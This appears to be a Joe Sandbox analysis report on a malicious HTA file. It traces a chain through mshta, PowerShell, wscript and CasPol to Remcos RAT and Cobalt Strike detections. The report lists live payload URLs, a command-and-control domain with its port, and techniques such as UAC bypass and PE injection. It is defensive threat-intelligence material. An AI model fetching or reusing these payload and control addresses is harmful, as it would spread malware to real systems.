                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559566 Sample: seethebestthignswhichgiving... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 53 banaya.duckdns.org 2->53 55 ip.1017.filemail.com 2->55 57 2 other IPs or domains 2->57 75 Suricata IDS alerts for network traffic 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 83 18 other signatures 2->83 11 mshta.exe 1 2->11         started        signatures3 81 Uses dynamic DNS services 53->81 process4 signatures5 107 Detected Cobalt Strike Beacon 11->107 109 Suspicious powershell command line found 11->109 111 PowerShell case anomaly found 11->111 14 powershell.exe 36 11->14         started        process6 dnsIp7 65 192.3.220.29, 49699, 49765, 80 AS-COLOCROSSINGUS United States 14->65 49 seehavingfacingbes...thentiretimegre.vbS, Unicode 14->49 dropped 51 C:\Users\user\AppData\...\2c1bgmxj.cmdline, Unicode 14->51 dropped 67 Detected Cobalt Strike Beacon 14->67 69 Suspicious powershell command line found 14->69 71 Obfuscated command line found 14->71 73 Found suspicious powershell code related to unpacking or dynamic code loading 14->73 19 wscript.exe 1 14->19         started        22 powershell.exe 21 14->22         started        24 csc.exe 3 14->24         started        27 conhost.exe 14->27         started        file8 signatures9 process10 file11 85 Detected Cobalt Strike Beacon 19->85 87 Suspicious powershell command line found 19->87 89 Wscript starts Powershell (via cmd or directly) 19->89 93 3 other signatures 19->93 29 powershell.exe 7 19->29         started        91 Loading BitLocker PowerShell Module 22->91 45 C:\Users\user\AppData\Local\...\2c1bgmxj.dll, PE32 24->45 dropped 32 cvtres.exe 1 24->32         started        signatures12 process13 signatures14 113 Detected Cobalt Strike Beacon 29->113 115 Suspicious powershell command line found 29->115 117 Obfuscated command line found 29->117 34 powershell.exe 15 16 29->34         started        38 conhost.exe 29->38         started        process15 dnsIp16 59 ip.1017.filemail.com 142.215.209.78, 443, 49713 HUMBER-COLLEGECA Canada 34->59 95 Writes to foreign memory regions 34->95 97 Injects a PE file into a foreign processes 34->97 40 CasPol.exe 3 15 34->40         started        signatures17 process18 dnsIp19 61 banaya.duckdns.org 192.3.101.149, 49773, 6946 AS-COLOCROSSINGUS United States 40->61 63 geoplugin.net 178.237.33.50, 49779, 80 ATOM86-ASATOM86NL Netherlands 40->63 47 C:\ProgramData\remcos\logs.dat, data 40->47 dropped 99 Contains functionality to bypass UAC (CMSTPLUA) 40->99 101 Detected Remcos RAT 40->101 103 Contains functionalty to change the wallpaper 40->103 105 5 other signatures 40->105 file20 signatures21

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    seethebestthignswhichgivingbestopportunities.hta21%ReversingLabsScript-WScript.Trojan.Asthma

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF9LMEM0%Avira URL Cloudsafe
                    http://192.3.220.29/0%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehaving0%Avira URL Cloudsafe
                    http://192.3.220.29/45/HDRDDG.txt0%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFn0%Avira URL Cloudsafe
                    http://crl.microsoftG0%Avira URL Cloudsafe
                    banaya.duckdns.org0%Avira URL Cloudsafe
                    https://www.html-code-generator.com0%Avira URL Cloudsafe
                    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu40%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0J/0%Avira URL Cloudsafe
                    http://www.microsoft.W?70%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    banaya.duckdns.org
                    		192.3.101.149
                    		truetrue
                      		unknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		high
                        ip.1017.filemail.com
                        		142.215.209.78
                        		truefalse
                          		high
                          1017.filemail.com
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFtrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ffalse
                              		high
                              http://geoplugin.net/json.gpfalse
                                		high
                                banaya.duckdns.orgtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://192.3.220.29/45/HDRDDG.txttrue
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1421144583.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1306026171.00000000063D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.html-code-generator.commshta.exe, 00000000.00000003.1257089016.0000000006827000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1290146069.0000000006670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1242645805.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1273166507.00000000056B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255793912.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1264355476.0000000006FD0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1251530852.0000000007041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1259885383.00000000070AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1242578602.0000000007446000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1250574154.0000000006827000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1250014151.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1282036247.00000000056B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1271739816.0000000006833000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252695052.00000000066F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1251672134.00000000056B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255340938.00000000074B0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1283281228.00000000066E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252283963.000000000675C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255426669.0000000007440000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1290936484.0000000007040000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252470032.00000000066E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://192.3.220.29/45/seehavingpowershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.microsoftGpowershell.exe, 00000003.00000002.1310086977.0000000008AA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://geoplugin.net/json.gplCasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://go.micropowershell.exe, 00000001.00000002.1414653804.000000000550D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://1017.filemail.compowershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF9LMEMpowershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4powershell.exe, 00000010.00000002.1669609816.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/pscore6LRpowershell.exe, 0000000E.00000002.2079393910.00000000051DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://go.microspowershell.exe, 00000003.00000002.1303936513.000000000584F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://geoplugin.net/json.gpSystem32CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://192.3.220.29/powershell.exe, 00000001.00000002.1424337882.0000000007ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://geoplugin.net/json.gp/Cpowershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1414653804.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303936513.0000000005371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079393910.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFnpowershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1421144583.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1306026171.00000000063D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:powershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.microsoft.W?7powershell.exe, 00000003.00000002.1310452454.0000000008AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1414653804.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303936513.0000000005371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079393910.00000000051B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0J/powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          192.3.220.29
                                                                          		unknownUnited States
                                                                          		36352AS-COLOCROSSINGUStrue
                                                                          142.215.209.78
                                                                          		ip.1017.filemail.comCanada
                                                                          		32156HUMBER-COLLEGECAfalse
                                                                          192.3.101.149
                                                                          		banaya.duckdns.orgUnited States
                                                                          		36352AS-COLOCROSSINGUStrue
                                                                          178.237.33.50
                                                                          		geoplugin.netNetherlands
                                                                          		8455ATOM86-ASATOM86NLfalse

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1559566
                                                                          Start date and time:2024-11-20 17:17:09 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 9m 12s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:24
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:seethebestthignswhichgivingbestopportunities.hta
                                                                          Detection:MAL
                                                                          Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@20/22@3/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 33.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 79
                                                                          • Number of non-executed functions: 189
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .hta
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target mshta.exe, PID 2816 because there are no executed function
                                                                          • Execution Graph export aborted for target powershell.exe, PID 4220 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 7040 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 7604 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: seethebestthignswhichgivingbestopportunities.hta

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          11:18:06API Interceptor139x Sleep call for process: powershell.exe modified
                                                                          12:53:49API Interceptor4894044x Sleep call for process: CasPol.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          192.3.220.29pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 192.3.220.29/45/HDRDDG.txt
                                                                          New order.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
                                                                          New order.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
                                                                          New order.xlsGet hashmaliciousUnknownBrowse
                                                                          • 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
                                                                          seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 192.3.220.29/66/SWRTFRR.txt
                                                                          CI.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 192.3.220.29/66/SWRTFRR.txt
                                                                          142.215.209.78pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                            PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                              seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                  bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                    #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                      seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                        Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                          kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                            bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                              192.3.101.149pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                  CI.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                    seethebestthingswithgoodthingswithgreatthignsfor.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                      1731343866c2de3056a60ef2333b3e4532593a69f279ecfa2002460801978b2e618aaa77bc130.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        178.237.33.50pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        file.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • geoplugin.net/json.gp

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        ip.1017.filemail.compi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                        • 142.215.209.78
                                                                                                        bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                        • 142.215.209.78
                                                                                                        banaya.duckdns.orgpi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 192.3.101.149
                                                                                                        geoplugin.netpi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 178.237.33.50
                                                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                        • 178.237.33.50
                                                                                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                        • 178.237.33.50
                                                                                                        globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        file.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 178.237.33.50

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        HUMBER-COLLEGECApi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                        • 142.215.209.78
                                                                                                        bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                        • 142.215.209.78
                                                                                                        AS-COLOCROSSINGUSgeneratethebstgoodpeoplesaroundtheworldwithgood.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                        • 107.173.4.61
                                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 192.3.101.149
                                                                                                        Transferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                        • 107.173.4.61
                                                                                                        seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                        • 192.3.22.13
                                                                                                        greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                        • 192.3.243.136
                                                                                                        Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 172.245.123.3
                                                                                                        Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                        • 192.3.243.136
                                                                                                        Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                        • 192.3.22.13
                                                                                                        9srIKeD54O.rtfGet hashmaliciousUnknownBrowse
                                                                                                        • 192.3.101.150
                                                                                                        exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                        • 75.127.14.170
                                                                                                        ATOM86-ASATOM86NLpi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 178.237.33.50
                                                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                        • 178.237.33.50
                                                                                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                        • 178.237.33.50
                                                                                                        globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                        • 178.237.33.50
